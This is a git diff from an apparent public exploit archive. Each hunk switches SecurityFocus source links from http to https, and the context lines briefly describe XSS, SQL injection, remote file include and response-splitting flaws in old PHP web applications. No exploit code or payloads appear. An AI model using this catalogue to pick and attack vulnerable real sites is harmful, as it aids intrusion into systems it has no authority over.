http://www.securityfocus.com/bid/13157/info +source: https://www.securityfocus.com/bid/13157/info Photo Album is affected by a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25404.txt b/exploits/php/webapps/25404.txt index 2d0ab89ad..90bab94b7 100644 --- a/exploits/php/webapps/25404.txt +++ b/exploits/php/webapps/25404.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13158/info +source: https://www.securityfocus.com/bid/13158/info Photo Album is affected by a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25422.txt b/exploits/php/webapps/25422.txt index 259d87780..679015c3a 100644 --- a/exploits/php/webapps/25422.txt +++ b/exploits/php/webapps/25422.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13169/info +source: https://www.securityfocus.com/bid/13169/info All4WWW-Homepagecreator is affected by an arbitrary remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an 'include()' function call. diff --git a/exploits/php/webapps/25423.txt b/exploits/php/webapps/25423.txt index 4d33e7c84..ac650506a 100644 --- a/exploits/php/webapps/25423.txt +++ b/exploits/php/webapps/25423.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13170/info +source: https://www.securityfocus.com/bid/13170/info sphpBlog is affected by a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25430.txt b/exploits/php/webapps/25430.txt index 3b0547abb..e72f141bd 100644 --- a/exploits/php/webapps/25430.txt +++ b/exploits/php/webapps/25430.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13201/info +source: https://www.securityfocus.com/bid/13201/info PHP-Nuke is prone to a HTTP response splitting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25431.pl b/exploits/php/webapps/25431.pl index a2fdab082..06c5564dd 100755 --- a/exploits/php/webapps/25431.pl +++ b/exploits/php/webapps/25431.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13206/info +source: https://www.securityfocus.com/bid/13206/info A remote file include vulnerability affects Ariadne CMS. This issue is due to a failure of the application to validate critical parameters before using them in a 'require_once()' function call. diff --git a/exploits/php/webapps/25432.txt b/exploits/php/webapps/25432.txt index 80139b284..0a641d958 100644 --- a/exploits/php/webapps/25432.txt +++ b/exploits/php/webapps/25432.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13209/info +source: https://www.securityfocus.com/bid/13209/info A remote SQL injection vulnerability affects the datenbank module for phpbb. This issue is due to a failure of the application to properly sanitize user-supplied input prior to including it in SQL queries. diff --git a/exploits/php/webapps/25433.txt b/exploits/php/webapps/25433.txt index 1d2d7672a..58e741060 100644 --- a/exploits/php/webapps/25433.txt +++ b/exploits/php/webapps/25433.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13210/info +source: https://www.securityfocus.com/bid/13210/info A remote cross-site scripting vulnerability affects the datenbank module for phpbb. This issue is due to a failure of the application to properly sanitize user-supplied input prior to including it in dynamically generated Web content. diff --git a/exploits/php/webapps/25434.txt b/exploits/php/webapps/25434.txt index cd5421e45..eac632a9b 100644 --- a/exploits/php/webapps/25434.txt +++ b/exploits/php/webapps/25434.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13212/info +source: https://www.securityfocus.com/bid/13212/info eGroupWare is prone to multiple input validation vulnerabilities. A fixed version is available. diff --git a/exploits/php/webapps/25435.txt b/exploits/php/webapps/25435.txt index 28d535e64..1069aeac3 100644 --- a/exploits/php/webapps/25435.txt +++ b/exploits/php/webapps/25435.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13212/info +source: https://www.securityfocus.com/bid/13212/info eGroupWare is prone to multiple input validation vulnerabilities. A fixed version is available. diff --git a/exploits/php/webapps/25436.txt b/exploits/php/webapps/25436.txt index ec7123328..38679cbca 100644 --- a/exploits/php/webapps/25436.txt +++ b/exploits/php/webapps/25436.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13212/info +source: https://www.securityfocus.com/bid/13212/info eGroupWare is prone to multiple input validation vulnerabilities. A fixed version is available. diff --git a/exploits/php/webapps/25437.txt b/exploits/php/webapps/25437.txt index 24fbde39c..4fdc07cb8 100644 --- a/exploits/php/webapps/25437.txt +++ b/exploits/php/webapps/25437.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13212/info +source: https://www.securityfocus.com/bid/13212/info eGroupWare is prone to multiple input validation vulnerabilities. A fixed version is available. diff --git a/exploits/php/webapps/25438.txt b/exploits/php/webapps/25438.txt index d73a0d84b..c4981f77e 100644 --- a/exploits/php/webapps/25438.txt +++ b/exploits/php/webapps/25438.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13213/info +source: https://www.securityfocus.com/bid/13213/info mvnForum is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25451.txt b/exploits/php/webapps/25451.txt index 1ca0b5bbf..c1dcf0fa4 100644 --- a/exploits/php/webapps/25451.txt +++ b/exploits/php/webapps/25451.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13219/info +source: https://www.securityfocus.com/bid/13219/info Knowledge Base Module is affected by an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/25457.c b/exploits/php/webapps/25457.c index 8fab5fd1b..706c10c09 100644 --- a/exploits/php/webapps/25457.c +++ b/exploits/php/webapps/25457.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13253/info +// source: https://www.securityfocus.com/bid/13253/info It is reported that UBB.threads is prone to an SQL injection vulnerability. diff --git a/exploits/php/webapps/25458.txt b/exploits/php/webapps/25458.txt index a4a549e13..06202d70e 100644 --- a/exploits/php/webapps/25458.txt +++ b/exploits/php/webapps/25458.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13255/info +source: https://www.securityfocus.com/bid/13255/info CityPost PHP LNKX is affected by a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input to the 'message.php' script. diff --git a/exploits/php/webapps/25459.txt b/exploits/php/webapps/25459.txt index 83bc5a286..dde69ae80 100644 --- a/exploits/php/webapps/25459.txt +++ b/exploits/php/webapps/25459.txt @@ -1,8 +1,8 @@ -source: http://www.securityfocus.com/bid/13256/info -source: http://www.securityfocus.com/bid/13257/info -source: http://www.securityfocus.com/bid/13258/info -source: http://www.securityfocus.com/bid/13259/info -source: http://www.securityfocus.com/bid/13260/info +source: https://www.securityfocus.com/bid/13256/info +source: https://www.securityfocus.com/bid/13257/info +source: https://www.securityfocus.com/bid/13258/info +source: https://www.securityfocus.com/bid/13259/info +source: https://www.securityfocus.com/bid/13260/info CityPost Image Cropper/Resizer is affected by a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input to the 'image-editor-52.php' script. diff --git a/exploits/php/webapps/25464.txt b/exploits/php/webapps/25464.txt index 1063b7e4e..825d2b077 100644 --- a/exploits/php/webapps/25464.txt +++ b/exploits/php/webapps/25464.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13261/info +source: https://www.securityfocus.com/bid/13261/info CityPost Simple PHP Upload is affected by a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input to the 'simple-upload-53.php' script. diff --git a/exploits/php/webapps/25467.txt b/exploits/php/webapps/25467.txt index 146ec1d74..3c3ed298f 100644 --- a/exploits/php/webapps/25467.txt +++ b/exploits/php/webapps/25467.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13275/info +source: https://www.securityfocus.com/bid/13275/info A remote PHP script injection vulnerability affects Netref. This issue is due to a failure of the application to sanitize user-supplied data. diff --git a/exploits/php/webapps/25468.txt b/exploits/php/webapps/25468.txt index b62c9581e..8c883752d 100644 --- a/exploits/php/webapps/25468.txt +++ b/exploits/php/webapps/25468.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13276/info +source: https://www.securityfocus.com/bid/13276/info PHP Labs proFile is prone to a cross-site scripting vulnerability. As a result, attackers may embed hostile HTML and script code in a malicious link to the affected application. If the link is followed, the code may be rendered by the victim's browser in the context of the vulnerable site. diff --git a/exploits/php/webapps/25469.txt b/exploits/php/webapps/25469.txt index fbbfeae37..0c7dfff8e 100644 --- a/exploits/php/webapps/25469.txt +++ b/exploits/php/webapps/25469.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13279/info +source: https://www.securityfocus.com/bid/13279/info Ocean12 Calendar Manager is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/25473.txt b/exploits/php/webapps/25473.txt index 2a9b894a8..af930e15a 100644 --- a/exploits/php/webapps/25473.txt +++ b/exploits/php/webapps/25473.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13282/info +source: https://www.securityfocus.com/bid/13282/info PHP Labs proFile is prone to a cross-site scripting vulnerability. As a result, attackers may embed hostile HTML and script code in a malicious link to the affected application. If the link is followed, the code may be rendered by the victim's browser in the context of the vulnerable site. diff --git a/exploits/php/webapps/25474.txt b/exploits/php/webapps/25474.txt index cf95baf35..ee8779217 100644 --- a/exploits/php/webapps/25474.txt +++ b/exploits/php/webapps/25474.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13283/info +source: https://www.securityfocus.com/bid/13283/info phpbb-auction module is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/25475.txt b/exploits/php/webapps/25475.txt index dc95966d4..0f9aabb73 100644 --- a/exploits/php/webapps/25475.txt +++ b/exploits/php/webapps/25475.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13284/info +source: https://www.securityfocus.com/bid/13284/info phpbb-auction module is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/25488.txt b/exploits/php/webapps/25488.txt index cd99a9542..be4431f0d 100644 --- a/exploits/php/webapps/25488.txt +++ b/exploits/php/webapps/25488.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13299/info +source: https://www.securityfocus.com/bid/13299/info PayProCart is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25489.txt b/exploits/php/webapps/25489.txt index 88670d37b..79065d145 100644 --- a/exploits/php/webapps/25489.txt +++ b/exploits/php/webapps/25489.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13303/info +source: https://www.securityfocus.com/bid/13303/info PayProCart is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25490.txt b/exploits/php/webapps/25490.txt index a5acaff69..35fd7ef30 100644 --- a/exploits/php/webapps/25490.txt +++ b/exploits/php/webapps/25490.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13305/info +source: https://www.securityfocus.com/bid/13305/info PayProCart is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25491.txt b/exploits/php/webapps/25491.txt index d45eb1798..f6930eb1a 100644 --- a/exploits/php/webapps/25491.txt +++ b/exploits/php/webapps/25491.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13306/info +source: https://www.securityfocus.com/bid/13306/info PayProCart is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25492.txt b/exploits/php/webapps/25492.txt index 2b887be89..a1dcea3a8 100644 --- a/exploits/php/webapps/25492.txt +++ b/exploits/php/webapps/25492.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13307/info +source: https://www.securityfocus.com/bid/13307/info PayProCart is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25494.txt b/exploits/php/webapps/25494.txt index 5dca657e5..fa287d475 100644 --- a/exploits/php/webapps/25494.txt +++ b/exploits/php/webapps/25494.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13308/info +source: https://www.securityfocus.com/bid/13308/info PayProCart is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25495.txt b/exploits/php/webapps/25495.txt index 1a816f97d..47812946e 100644 --- a/exploits/php/webapps/25495.txt +++ b/exploits/php/webapps/25495.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13309/info +source: https://www.securityfocus.com/bid/13309/info PayProCart is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25503.txt b/exploits/php/webapps/25503.txt index 6690b74d7..394f8985a 100644 --- a/exploits/php/webapps/25503.txt +++ b/exploits/php/webapps/25503.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13325/info +source: https://www.securityfocus.com/bid/13325/info WoltLab Burning Board is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25523.txt b/exploits/php/webapps/25523.txt index f5d2b83c8..40f9aac59 100644 --- a/exploits/php/webapps/25523.txt +++ b/exploits/php/webapps/25523.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13344/info +source: https://www.securityfocus.com/bid/13344/info phpBB is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25524.txt b/exploits/php/webapps/25524.txt index 69addbc9d..7aaaf5348 100644 --- a/exploits/php/webapps/25524.txt +++ b/exploits/php/webapps/25524.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13345/info +source: https://www.securityfocus.com/bid/13345/info phpBB is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25528.txt b/exploits/php/webapps/25528.txt index 83f58a607..710d06445 100644 --- a/exploits/php/webapps/25528.txt +++ b/exploits/php/webapps/25528.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13353/info +source: https://www.securityfocus.com/bid/13353/info WoltLab Burning Board is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25531.html b/exploits/php/webapps/25531.html index d287e5e41..99c8be80d 100644 --- a/exploits/php/webapps/25531.html +++ b/exploits/php/webapps/25531.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13370/info +source: https://www.securityfocus.com/bid/13370/info phpMyVisites allows attackers to include arbitrary files. While it has been demonstrated that local files may be included through this vulnerability, there is an unconfirmed possibility of remote file inclusion. diff --git a/exploits/php/webapps/25532.txt b/exploits/php/webapps/25532.txt index ca868e0fb..2d6035c62 100644 --- a/exploits/php/webapps/25532.txt +++ b/exploits/php/webapps/25532.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13371/info +source: https://www.securityfocus.com/bid/13371/info yappa-ng is prone to a remote file include vulnerability. This issue may let remote attackers include and execute malicious remote PHP scripts. diff --git a/exploits/php/webapps/25533.txt b/exploits/php/webapps/25533.txt index a6164cd4b..798e1c7fb 100644 --- a/exploits/php/webapps/25533.txt +++ b/exploits/php/webapps/25533.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13372/info +source: https://www.securityfocus.com/bid/13372/info yappa-ng is prone to an unspecified cross-site scripting vulnerability. This issue may allow for theft of cookie-based authentication credentials or other attacks. diff --git a/exploits/php/webapps/25534.txt b/exploits/php/webapps/25534.txt index 7d5dafdf0..9dcee4490 100644 --- a/exploits/php/webapps/25534.txt +++ b/exploits/php/webapps/25534.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13374/info +source: https://www.securityfocus.com/bid/13374/info SQWebmail is prone to a HTTP response splitting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25535.txt b/exploits/php/webapps/25535.txt index e9f431835..f8572993e 100644 --- a/exploits/php/webapps/25535.txt +++ b/exploits/php/webapps/25535.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13375/info +source: https://www.securityfocus.com/bid/13375/info Invision Power Board is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/25538.txt b/exploits/php/webapps/25538.txt index 124b5241c..a34c87e13 100644 --- a/exploits/php/webapps/25538.txt +++ b/exploits/php/webapps/25538.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13381/info +source: https://www.securityfocus.com/bid/13381/info GrayCMS is prone to a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25545.txt b/exploits/php/webapps/25545.txt index f2af52116..6eb52aded 100644 --- a/exploits/php/webapps/25545.txt +++ b/exploits/php/webapps/25545.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13398/info +source: https://www.securityfocus.com/bid/13398/info bBlog is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/25548.txt b/exploits/php/webapps/25548.txt index 26bf6fc83..2c01fdce8 100644 --- a/exploits/php/webapps/25548.txt +++ b/exploits/php/webapps/25548.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13406/info +source: https://www.securityfocus.com/bid/13406/info PHPCart is prone to a remote input validation vulnerability. The issue exists because the software fails to sufficiently sanitize URI parameter data that is employed when computing product charges. diff --git a/exploits/php/webapps/25549.txt b/exploits/php/webapps/25549.txt index ec643f2ad..8ea79b910 100644 --- a/exploits/php/webapps/25549.txt +++ b/exploits/php/webapps/25549.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13407/info +source: https://www.securityfocus.com/bid/13407/info Multiple remote input validation vulnerabilities affect Claroline e-Learning Application. These issues are due to a failure of the application to properly sanitize user-supplied input prior to using it to carry out critical application functionality such as database interaction and generating dynamic Web content. diff --git a/exploits/php/webapps/25550.txt b/exploits/php/webapps/25550.txt index 5671c5f29..b34a6ca50 100644 --- a/exploits/php/webapps/25550.txt +++ b/exploits/php/webapps/25550.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13407/info +source: https://www.securityfocus.com/bid/13407/info Multiple remote input validation vulnerabilities affect Claroline e-Learning Application. These issues are due to a failure of the application to properly sanitize user-supplied input prior to using it to carry out critical application functionality such as database interaction and generating dynamic Web content. diff --git a/exploits/php/webapps/25551.txt b/exploits/php/webapps/25551.txt index c6cf16dfc..3c207d72e 100644 --- a/exploits/php/webapps/25551.txt +++ b/exploits/php/webapps/25551.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13407/info +source: https://www.securityfocus.com/bid/13407/info Multiple remote input validation vulnerabilities affect Claroline e-Learning Application. These issues are due to a failure of the application to properly sanitize user-supplied input prior to using it to carry out critical application functionality such as database interaction and generating dynamic Web content. diff --git a/exploits/php/webapps/25552.txt b/exploits/php/webapps/25552.txt index 378a6bb4d..d878b3300 100644 --- a/exploits/php/webapps/25552.txt +++ b/exploits/php/webapps/25552.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13407/info +source: https://www.securityfocus.com/bid/13407/info Multiple remote input validation vulnerabilities affect Claroline e-Learning Application. These issues are due to a failure of the application to properly sanitize user-supplied input prior to using it to carry out critical application functionality such as database interaction and generating dynamic Web content. diff --git a/exploits/php/webapps/25553.txt b/exploits/php/webapps/25553.txt index d039b137d..b99fc64bc 100644 --- a/exploits/php/webapps/25553.txt +++ b/exploits/php/webapps/25553.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13407/info +source: https://www.securityfocus.com/bid/13407/info Multiple remote input validation vulnerabilities affect Claroline e-Learning Application. These issues are due to a failure of the application to properly sanitize user-supplied input prior to using it to carry out critical application functionality such as database interaction and generating dynamic Web content. diff --git a/exploits/php/webapps/25555.txt b/exploits/php/webapps/25555.txt index 638a51af5..b80c7b265 100644 --- a/exploits/php/webapps/25555.txt +++ b/exploits/php/webapps/25555.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13412/info +source: https://www.securityfocus.com/bid/13412/info Koobi CMS is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/25556.txt b/exploits/php/webapps/25556.txt index 75dd655fa..e47cb1e1e 100644 --- a/exploits/php/webapps/25556.txt +++ b/exploits/php/webapps/25556.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13413/info +source: https://www.securityfocus.com/bid/13413/info Koobi CMS is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/25558.txt b/exploits/php/webapps/25558.txt index 22d3dfab7..7a78b9461 100644 --- a/exploits/php/webapps/25558.txt +++ b/exploits/php/webapps/25558.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13417/info +source: https://www.securityfocus.com/bid/13417/info The notes module for phpBB is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/25560.txt b/exploits/php/webapps/25560.txt index 69d9573c6..6abc9268c 100644 --- a/exploits/php/webapps/25560.txt +++ b/exploits/php/webapps/25560.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13419/info +source: https://www.securityfocus.com/bid/13419/info Amazon Webstore is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25564.txt b/exploits/php/webapps/25564.txt index 04f0dbabc..dc6c19288 100644 --- a/exploits/php/webapps/25564.txt +++ b/exploits/php/webapps/25564.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13425/info +source: https://www.securityfocus.com/bid/13425/info Amazon Webstore is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25565.txt b/exploits/php/webapps/25565.txt index 96a0f08c9..a6713b12e 100644 --- a/exploits/php/webapps/25565.txt +++ b/exploits/php/webapps/25565.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13426/info +source: https://www.securityfocus.com/bid/13426/info Amazon Webstore is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25566.txt b/exploits/php/webapps/25566.txt index 59208f84f..949457d91 100644 --- a/exploits/php/webapps/25566.txt +++ b/exploits/php/webapps/25566.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13427/info +source: https://www.securityfocus.com/bid/13427/info Amazon Webstore is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25567.txt b/exploits/php/webapps/25567.txt index 0ab1c24aa..e64b4474b 100644 --- a/exploits/php/webapps/25567.txt +++ b/exploits/php/webapps/25567.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13428/info +source: https://www.securityfocus.com/bid/13428/info Amazon Webstore is prone to a HTTP response splitting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25568.txt b/exploits/php/webapps/25568.txt index 62b3fa1ff..3d59926f2 100644 --- a/exploits/php/webapps/25568.txt +++ b/exploits/php/webapps/25568.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13433/info +source: https://www.securityfocus.com/bid/13433/info PHPCoin is reportedly affected by multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/25569.txt b/exploits/php/webapps/25569.txt index c2140e8f7..970239438 100644 --- a/exploits/php/webapps/25569.txt +++ b/exploits/php/webapps/25569.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13433/info +source: https://www.securityfocus.com/bid/13433/info PHPCoin is reportedly affected by multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/25570.txt b/exploits/php/webapps/25570.txt index 0525ab5fb..ccbe404d9 100644 --- a/exploits/php/webapps/25570.txt +++ b/exploits/php/webapps/25570.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13451/info +source: https://www.securityfocus.com/bid/13451/info JGS-Portal is prone to an SQL injection. This issue may potentially be exploited to compromise the software or gain unauthorized access to the database. diff --git a/exploits/php/webapps/25575.txt b/exploits/php/webapps/25575.txt index 862aed9f3..3529178c3 100644 --- a/exploits/php/webapps/25575.txt +++ b/exploits/php/webapps/25575.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13462/info +source: https://www.securityfocus.com/bid/13462/info ViArt Shop is affected by multiple cross-site scripting and HTML injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/25576.txt b/exploits/php/webapps/25576.txt index cfdc50784..3cf0871f2 100644 --- a/exploits/php/webapps/25576.txt +++ b/exploits/php/webapps/25576.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13462/info +source: https://www.securityfocus.com/bid/13462/info ViArt Shop is affected by multiple cross-site scripting and HTML injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/25577.txt b/exploits/php/webapps/25577.txt index 24ca7385b..75aacd606 100644 --- a/exploits/php/webapps/25577.txt +++ b/exploits/php/webapps/25577.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13462/info +source: https://www.securityfocus.com/bid/13462/info ViArt Shop is affected by multiple cross-site scripting and HTML injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/25578.txt b/exploits/php/webapps/25578.txt index 0760b1888..eed0183cb 100644 --- a/exploits/php/webapps/25578.txt +++ b/exploits/php/webapps/25578.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13462/info +source: https://www.securityfocus.com/bid/13462/info ViArt Shop is affected by multiple cross-site scripting and HTML injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/25579.txt b/exploits/php/webapps/25579.txt index 4cfc063ef..369017765 100644 --- a/exploits/php/webapps/25579.txt +++ b/exploits/php/webapps/25579.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13462/info +source: https://www.securityfocus.com/bid/13462/info ViArt Shop is affected by multiple cross-site scripting and HTML injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/25580.txt b/exploits/php/webapps/25580.txt index 2b6898e4c..4132431a8 100644 --- a/exploits/php/webapps/25580.txt +++ b/exploits/php/webapps/25580.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13462/info +source: https://www.securityfocus.com/bid/13462/info ViArt Shop is affected by multiple cross-site scripting and HTML injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/25590.txt b/exploits/php/webapps/25590.txt index db99774e6..c8fb162ee 100644 --- a/exploits/php/webapps/25590.txt +++ b/exploits/php/webapps/25590.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13478/info +source: https://www.securityfocus.com/bid/13478/info osTicket is affected by multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25591.txt b/exploits/php/webapps/25591.txt index 91b695762..e58aea11d 100644 --- a/exploits/php/webapps/25591.txt +++ b/exploits/php/webapps/25591.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13481/info +source: https://www.securityfocus.com/bid/13481/info SitePanel2 is affected by multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25593.txt b/exploits/php/webapps/25593.txt index 16e3dcfc3..611123571 100644 --- a/exploits/php/webapps/25593.txt +++ b/exploits/php/webapps/25593.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13483/info +source: https://www.securityfocus.com/bid/13483/info Invision Power Board is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25599.txt b/exploits/php/webapps/25599.txt index ebff965c8..51915dbbb 100644 --- a/exploits/php/webapps/25599.txt +++ b/exploits/php/webapps/25599.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13493/info +source: https://www.securityfocus.com/bid/13493/info Interspire ArticleLive is reportedly prone to multiple vulnerabilities. These issues may allow a remote attacker to gain administrative access to the application and carry out various cross-site scripting attacks. diff --git a/exploits/php/webapps/25601.txt b/exploits/php/webapps/25601.txt index 1f54cc276..578a160ae 100644 --- a/exploits/php/webapps/25601.txt +++ b/exploits/php/webapps/25601.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13499/info +source: https://www.securityfocus.com/bid/13499/info FishCart is prone to multiple cross-site scripting and SQL-injection 